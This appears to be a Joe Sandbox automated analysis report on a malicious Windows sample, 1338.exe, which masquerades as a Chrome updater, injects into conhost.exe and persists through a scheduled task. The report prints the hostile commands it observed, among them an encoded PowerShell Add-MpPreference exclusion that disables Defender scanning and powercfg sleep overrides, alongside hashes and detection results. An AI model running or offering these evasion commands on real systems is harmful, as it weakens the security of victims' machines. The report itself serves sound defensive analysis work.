                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation

                    Lowering of HIPS / PFW / Operating System Security Settings

                    barindex
                    Modifies power options to not sleep / hibernate
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0 Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0 Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0 Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0 Jump to behavior

                    Mitre Att&ck Matrix

                    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                    Valid Accounts1
                    Windows Management Instrumentation                    		1
                    Scheduled Task/Job                    		512
                    Process Injection                    		113
                    Masquerading                    		OS Credential Dumping1
                    Security Software Discovery                    		Remote Services1
                    Archive Collected Data                    		Exfiltration Over Other Network Medium1
                    Encrypted Channel                    		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                    Default Accounts11
                    Command and Scripting Interpreter                    		Boot or Logon Initialization Scripts1
                    Scheduled Task/Job                    		21
                    Virtualization/Sandbox Evasion                    		LSASS Memory1
                    Query Registry                    		Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                    Domain Accounts1
                    Scheduled Task/Job                    		Logon Script (Windows)Logon Script (Windows)512
                    Process Injection                    		Security Account Manager2
                    Process Discovery                    		SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                    Local Accounts1
                    PowerShell                    		Logon Script (Mac)Logon Script (Mac)2
                    Deobfuscate/Decode Files or Information                    		NTDS21
                    Virtualization/Sandbox Evasion                    		Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
                    Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                    Obfuscated Files or Information                    		LSA Secrets1
                    Application Window Discovery                    		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                    Replication Through Removable MediaLaunchdRc.commonRc.common1
                    Software Packing                    		Cached Domain Credentials1
                    File and Directory Discovery                    		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                    External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                    File Deletion                    		DCSync12
                    System Information Discovery                    		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 signatures2 2 Behavior Graph ID: 633539 Sample: 1338.exe Startdate: 24/05/2022 Architecture: WINDOWS Score: 100 57 Antivirus detection for dropped file 2->57 59 Antivirus / Scanner detection for submitted sample 2->59 61 Multi AV Scanner detection for dropped file 2->61 63 6 other signatures 2->63 8 1338.exe 2->8         started        11 updater.exe 2->11         started        process3 signatures4 75 Writes to foreign memory regions 8->75 77 Allocates memory in foreign processes 8->77 79 Creates a thread in another existing process (thread injection) 8->79 13 conhost.exe 6 8->13         started        17 conhost.exe 7 11->17         started        process5 file6 53 C:\Program Filesbehaviorgraphoogle\Chrome\updater.exe, PE32+ 13->53 dropped 55 C:\...\updater.exe:Zone.Identifier, ASCII 13->55 dropped 81 Obfuscated command line found 13->81 19 cmd.exe 1 13->19         started        22 cmd.exe 1 13->22         started        24 cmd.exe 1 13->24         started        26 cmd.exe 1 13->26         started        83 Creates files in the system32 config directory 17->83 85 Modifies the context of a thread in another process (thread injection) 17->85 87 Injects a PE file into a foreign processes 17->87 28 cmd.exe 17->28         started        30 cmd.exe 1 17->30         started        32 conhost.exe 17->32         started        signatures7 process8 signatures9 65 Encrypted powershell cmdline option found 19->65 67 Uses schtasks.exe or at.exe to add and modify task schedules 19->67 69 Uses powercfg.exe to modify the power settings 19->69 34 powershell.exe 23 19->34         started        36 conhost.exe 19->36         started        71 Modifies power options to not sleep / hibernate 22->71 45 5 other processes 22->45 47 2 other processes 24->47 49 2 other processes 26->49 38 powershell.exe 28->38         started        41 conhost.exe 28->41         started        51 5 other processes 30->51 43 conhost.exe 2 32->43         started        process10 signatures11 73 Creates files in the system32 config directory 38->73

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    1338.exe68%VirustotalBrowse
                    1338.exe33%MetadefenderBrowse
                    1338.exe73%ReversingLabsWin64.Hacktool.Sysdupate
                    1338.exe100%AviraHEUR/AGEN.1205338

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Program Files\Google\Chrome\updater.exe100%AviraHEUR/AGEN.1205338
                    C:\Program Files\Google\Chrome\updater.exe68%VirustotalBrowse
                    C:\Program Files\Google\Chrome\updater.exe33%MetadefenderBrowse
                    C:\Program Files\Google\Chrome\updater.exe73%ReversingLabsWin64.Hacktool.Sysdupate

                    Unpacked PE Files

                    SourceDetectionScannerLabelLinkDownload
                    37.0.conhost.exe.400000.7.unpack100%AviraHEUR/AGEN.1205338Download File
                    37.0.conhost.exe.400000.3.unpack100%AviraHEUR/AGEN.1205338Download File
                    37.0.conhost.exe.400000.6.unpack100%AviraHEUR/AGEN.1205338Download File
                    23.2.updater.exe.400000.0.unpack100%AviraHEUR/AGEN.1205338Download File
                    37.0.conhost.exe.400000.4.unpack100%AviraHEUR/AGEN.1205338Download File
                    37.2.conhost.exe.400000.0.unpack100%AviraHEUR/AGEN.1205338Download File
                    37.0.conhost.exe.400000.0.unpack100%AviraHEUR/AGEN.1205338Download File
                    23.0.updater.exe.400000.0.unpack100%AviraHEUR/AGEN.1205338Download File
                    37.0.conhost.exe.400000.2.unpack100%AviraHEUR/AGEN.1205338Download File
                    37.0.conhost.exe.400000.1.unpack100%AviraHEUR/AGEN.1205338Download File
                    0.0.1338.exe.400000.0.unpack100%AviraHEUR/AGEN.1205338Download File
                    0.2.1338.exe.400000.0.unpack100%AviraHEUR/AGEN.1205338Download File
                    37.0.conhost.exe.400000.5.unpack100%AviraHEUR/AGEN.1205338Download File

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    http://crl.microsoft.coji0%Avira URL Cloudsafe
                    http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                    http://crl.microsoft0%URL Reputationsafe
                    https://go.micro0%URL Reputationsafe
                    https://contoso.com/0%URL Reputationsafe
                    https://contoso.com/License0%URL Reputationsafe
                    https://contoso.com/Icon0%URL Reputationsafe
                    http://www.jsonrpc.org/0%URL Reputationsafe
                    https://www.vign.0%Avira URL Cloudsafe
                    http://crl.micros0%URL Reputationsafe

                    Domains and IPs

                    Contacted Domains

                    No contacted domains info

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://crl.microsoft.cojipowershell.exe, 00000004.00000003.442875745.000002986A154000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://nuget.org/NuGet.exepowershell.exe, 00000004.00000002.478394402.0000029862043000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000004.00000002.469456893.00000298521EF000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000004.00000002.469456893.00000298521EF000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://crl.microsoftpowershell.exe, 00000004.00000003.442875745.000002986A154000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000004.00000002.469456893.00000298521EF000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://go.micropowershell.exe, 00000004.00000002.478242785.00000298536E6000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000004.00000002.469456893.00000298521EF000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://contoso.com/powershell.exe, 00000004.00000002.478394402.0000029862043000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://nuget.org/nuget.exepowershell.exe, 00000004.00000002.478394402.0000029862043000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://contoso.com/Licensepowershell.exe, 00000004.00000002.478394402.0000029862043000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://contoso.com/Iconpowershell.exe, 00000004.00000002.478394402.0000029862043000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.jsonrpc.org/conhost.exe, 00000018.00000002.661999485.0000027E112A3000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameconhost.exe, 00000001.00000002.516335707.000002779FFB6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.469069937.0000029851FE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.599425355.0000023C45321000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://github.com/Pester/Pesterpowershell.exe, 00000004.00000002.469456893.00000298521EF000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://github.com/openwall/john/issues/3454#issuecomment-436899959conhost.exe, 00000018.00000002.655565529.0000027E1095A000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000018.00000002.661999485.0000027E112A3000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://www.vign.powershell.exe, 00000004.00000002.479136799.000002986A060000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://crl.microspowershell.exe, 00000004.00000002.479466307.000002986A4C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.gnu.org/licenses/conhost.exe, 00000018.00000002.655565529.0000027E1095A000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000018.00000002.661999485.0000027E112A3000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high

                                      World Map of Contacted IPs

                                      No contacted IP infos

                                      General Information

                                      Joe Sandbox Version:34.0.0 Boulder Opal
                                      Analysis ID:633539
                                      Start date and time: 24/05/202222:18:012022-05-24 22:18:01 +02:00
                                      Joe Sandbox Product:CloudBasic
                                      Overall analysis duration:0h 9m 17s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Sample file name:1338.exe
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                      Number of analysed new started processes analysed:44
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • HDC enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Detection:MAL
                                      Classification:mal100.troj.spyw.evad.mine.winEXE@52/13@0/0
                                      EGA Information:
                                      • Successful, ratio: 83.3%
                                      HDC Information:
                                      • Successful, ratio: 44.6% (good quality ratio 30.4%)
                                      • Quality average: 45%
                                      • Quality standard deviation: 38.6%
                                      HCA Information:
                                      • Successful, ratio: 99%
                                      • Number of executed functions: 64
                                      • Number of non-executed functions: 7
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe
                                      • Adjust boot time
                                      • Enable AMSI

                                      Warnings

                                      • Exclude process from analysis (whitelisted): audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe
                                      • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, store-images.s-microsoft.com, login.live.com, ctldl.windowsupdate.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                                      • Execution Graph export aborted for target powershell.exe, PID 6280 because it is empty
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                      • Report size getting too big, too many NtSetInformationFile calls found.

                                      Simulations

                                      Behavior and APIs

                                      TimeTypeDescription
                                      22:19:14API Interceptor1x Sleep call for process: 1338.exe modified
                                      22:19:19API Interceptor59x Sleep call for process: powershell.exe modified
                                      22:19:44Task SchedulerRun new task: GoogleUpdateTaskMachineQC path: "C:\Program Files\Google\Chrome\updater.exe"
                                      22:19:56API Interceptor1x Sleep call for process: updater.exe modified
                                      22:20:51API Interceptor78x Sleep call for process: conhost.exe modified

                                      Joe Sandbox View / Context

                                      IPs

                                      No context

                                      Domains

                                      No context

                                      ASNs

                                      No context

                                      JA3 Fingerprints

                                      No context

                                      Dropped Files

                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                      C:\Program Files\Google\Chrome\updater.exe[RDR2]Mode-MENU.exeGet hashmaliciousBrowse

                                        Created / dropped Files

                                        C:\Program Files\Google\Chrome\updater.exe

                                        Download File
                                        Process:C:\Windows\System32\conhost.exe
                                        File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                        Category:dropped
                                        Size (bytes):1951744
                                        Entropy (8bit):7.999416157743483
                                        Encrypted:true
                                        SSDEEP:49152:bSq99dc5dgyd2j/audFlu5EWEKzCOg/t/XBbntjrXfNpTM:b59STNYjFF8EKLgVRbtjrXH
                                        MD5:AC711E6653707F0B1D245FF40D95385F
                                        SHA1:279B9ABAF000303983D6ECFB91E8B221B00FB198
                                        SHA-256:909409814D725477622728168035C3F2D259B5D8AA1CA77403D8C259BD7ABA63
                                        SHA-512:D394116574E829BC30EEBEBC71ADADB2894D00E7DC31F35EAE0A67675C5FC093BE660382F242A80DFACF5415175B1FFD5817BD408C82F5800E52EA5E4196326E
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Avira, Detection: 100%
                                        • Antivirus: Virustotal, Detection: 68%, Browse
                                        • Antivirus: Metadefender, Detection: 33%, Browse
                                        • Antivirus: ReversingLabs, Detection: 73%
                                        Joe Sandbox View:
                                        • Filename: [RDR2]Mode-MENU.exe, Detection: malicious, Browse
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................./...........................@.....................................\....................................................... ...<.......0...........................................................................\................................text............................... ..`.rdata..l.... ......................@..@.bss.....................................pdata..............................@..@.rsrc...0...........................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                        C:\Program Files\Google\Chrome\updater.exe:Zone.Identifier

                                        Download File
                                        Process:C:\Windows\System32\conhost.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):26
                                        Entropy (8bit):3.95006375643621
                                        Encrypted:false
                                        SSDEEP:3:ggPYV:rPYV
                                        MD5:187F488E27DB4AF347237FE461A079AD
                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                        Malicious:true
                                        Preview:[ZoneTransfer]....ZoneId=0

                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log

                                        Download File
                                        Process:C:\Windows\System32\conhost.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:modified
                                        Size (bytes):443
                                        Entropy (8bit):5.329235780090069
                                        Encrypted:false
                                        SSDEEP:12:Q3La/KDLI4MWuPTxAIWzAbDLI4MNCIBTav:ML9E4Kr8sXE4+Y
                                        MD5:4B5F77D7DC008444A394BA7804852C7F
                                        SHA1:78A05517844669432DE9E5A969BF3D36A34BDCF5
                                        SHA-256:F53487DA3DC7ED3FE66BB543B1596A8E87AF2B75FFDA4CE72B4965635998C535
                                        SHA-512:2017C8491B5AB578C8CF2B424AB82D733E94CA66AB0F63EC16908CCDEE22DD9DF7E9BBEE4FA43FAF60857A3EA1437B52A18BD1EE374F95F397CAF7FA794E73F2
                                        Malicious:false
                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Management\d0f4eb5b1d0857aabc3e7dd079735875\System.Management.ni.dll",0..

                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):1292
                                        Entropy (8bit):5.351662875791918
                                        Encrypted:false
                                        SSDEEP:24:3vQPpQrLAo4KAxX5qRPD42HOoVZe9t4CvKuKnKJRSF8PQ9eF:oPerB4nqRL/Hvfe9t4Cv94aR48Y9eF
                                        MD5:7350077B94CE0B377F5777951DA008BA
                                        SHA1:7B4DBDAD5882D960A13748B5A5E4D9B04E6B0724
                                        SHA-256:FB0F3EDD76324917FAAF82F06D434D956A1686CAD6DB46228EABD7F9FFFF9974
                                        SHA-512:48DE509CCDB58A1433F29F77DDD784921783E6116AA039FFB752AE0BE8544A1740526972E9F9DDCCA6B084119FA7FECEB32DD40A51AB010C0EFE87098807A032
                                        Malicious:false
                                        Preview:@...e................................................@..........8................'....L..}............System.Numerics.H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHost0...............G-.o...A...4B..........System..4...............[...{a.C..%6..h.........System.Core.D...............fZve...F.....x.)........System.Management.AutomationL...............7.....J@......~.......#.Microsoft.Management.Infrastructure.<................H..QN.Y.f............System.Management...@................Lo...QN......<Q........System.DirectoryServices4................Zg5..:O..g..q..........System.Xml..4...............T..'Z..N..Nvj.G.........System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<...............)L..Pz.O.E.R............System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins

                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iz5dcerk.5l1.psm1

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:very short file (no magic)
                                        Category:dropped
                                        Size (bytes):1
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3:U:U
                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                        Malicious:false
                                        Preview:1

                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_luxykyrv.0d4.ps1

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:very short file (no magic)
                                        Category:dropped
                                        Size (bytes):1
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3:U:U
                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                        Malicious:false
                                        Preview:1

                                        C:\Users\user\Documents\20220524\PowerShell_transcript.138727.wGZBkiVH.20220524221918.txt

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):6366
                                        Entropy (8bit):5.5669525407628635
                                        Encrypted:false
                                        SSDEEP:96:BZYG/EN2TkgalkUqDo1ZHaZi/EN2TkgalkUqDo1Z86jAjijjZj/EN2TkgalkUqD9:UuTfalkQTfalkGTfalk1
                                        MD5:0C5F24AC3F3773FEEF32AC2A139871D1
                                        SHA1:3C3772E6BCE7381730CF37B74ADB8C72265BC8B0
                                        SHA-256:8EFFDDE982D27DD9B3FDEC8C2F88EF85464B80B107C4887D8EDB976340BD2045
                                        SHA-512:1431FDB15939AF3351E2BECFAE308D20A1D9F055CBD06ECA9E87DD6516C37A1BD31C57081193EDA797B442759C2A6C4EB041904227F9DF070E89D0BB755FE1D4
                                        Malicious:false
                                        Preview:.**********************..Windows PowerShell transcript start..Start time: 20220524221919..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 138727 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell -EncodedCommand PAAjAG0AbwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHMAdQBuACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHAAdwBrAHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaQBrAHkAdQAjAD4A..Process ID: 6280..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220524221919..**********************..PS><#mo#> Add-MpPreference <#sun#> -ExclusionPath @($e

                                        C:\Windows\System32\20220524\PowerShell_transcript.138727.N6O0aqP_.20220524222001.txt

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):6330
                                        Entropy (8bit):5.571120625511297
                                        Encrypted:false
                                        SSDEEP:96:BZYNEN2TkgalkZqDo1ZWaZNNEN2TkgalkZqDo1Zt6jAjijjZnNEN2TkgalkZqDoY:STfalkRTfalk+Tfalkw
                                        MD5:6B46A65B7C23145B8AA479C1A4922E0D
                                        SHA1:9B767D0563C67E0F7D970ECC19BC3B4F3A6114A2
                                        SHA-256:79A6D830DE77785BE17BA531028CE085CFE7EDAF4C3ABD98BCE92988C416FFD9
                                        SHA-512:CE19854E88FE6A4BE06674B81107706A9506120004650FEB4E259E227855BC3A942322AEC9120BC15343DFA58D920730BCA1A372594B56D11721F1C6963984E8
                                        Malicious:false
                                        Preview:.**********************..Windows PowerShell transcript start..Start time: 20220524222003..Username: WORKGROUP\SYSTEM..RunAs User: WORKGROUP\SYSTEM..Configuration Name: ..Machine: 138727 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell -EncodedCommand PAAjAG0AbwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHMAdQBuACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHAAdwBrAHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaQBrAHkAdQAjAD4A..Process ID: 6476..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220524222003..**********************..PS><#mo#> Add-MpPreference <#sun#> -ExclusionPath @($env:UserProfi

                                        C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log

                                        Download File
                                        Process:C:\Windows\System32\conhost.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):539
                                        Entropy (8bit):5.348465763088588
                                        Encrypted:false
                                        SSDEEP:12:Q3La/KDLI4MWuPTxAIWzAbDLI4MNCIBTaDAWDLI4MWuCv:ML9E4Kr8sXE4+aE4Ks
                                        MD5:AD3DC4BDB13FFE4ABD214A6EB4E5A519
                                        SHA1:A2C3FCBCA3F40AE579E303AA8E8E2810860F088C
                                        SHA-256:EEA4FDD5FA39D6145F4C5ABFB3BEB63C1D750B2BBA95D5D9D52F245AA07DC02D
                                        SHA-512:50E0046F80823EB299545C16DD4A027A6294CC74294AE12D9A40F62FB6F1E92319511E90486427F2FEE44E6BB3E1317EA582284FB6CD82CA1BE9B5F3614BBE12
                                        Malicious:false
                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Management\d0f4eb5b1d0857aabc3e7dd079735875\System.Management.ni.dll",0..2,"System.IO.Compression, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..

                                        C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):18817
                                        Entropy (8bit):5.001217266823362
                                        Encrypted:false
                                        SSDEEP:384:ufib4GGVoGIpN6KQkj2Akjh4iUxGzCdaOdB/NXp5CvOjJEYoV4fib41:uIGV3IpNBQkj25h4iUxGzCdaOdB/NZwY
                                        MD5:DB93B232EFF0785FDDC28A0D5DAE38D2
                                        SHA1:AF5AFE47557C49F165F66B2B63962D9EB28E3157
                                        SHA-256:92939214003421B64153B215D15F89595673C709110FC6E005FF955F6684C390
                                        SHA-512:5D161CFEE2631553AC2FA8EE407FE4CBA23C9A666BB69049C0FCCBEE99413983C678E4779426532FB4F5E622155C9EFF8DA57CD93AE4453D57301B32C19CBAA9
                                        Malicious:false
